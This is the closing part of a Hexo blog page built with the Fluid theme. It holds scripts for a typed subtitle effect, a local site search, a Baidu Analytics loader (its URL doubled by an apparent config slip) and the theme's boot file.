
  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>












  
    <!-- Baidu Analytics -->
    <script defer>
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?https://hm.baidu.com/hm.js?613daf119ed9302ff8cc0e60daf78bfe";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
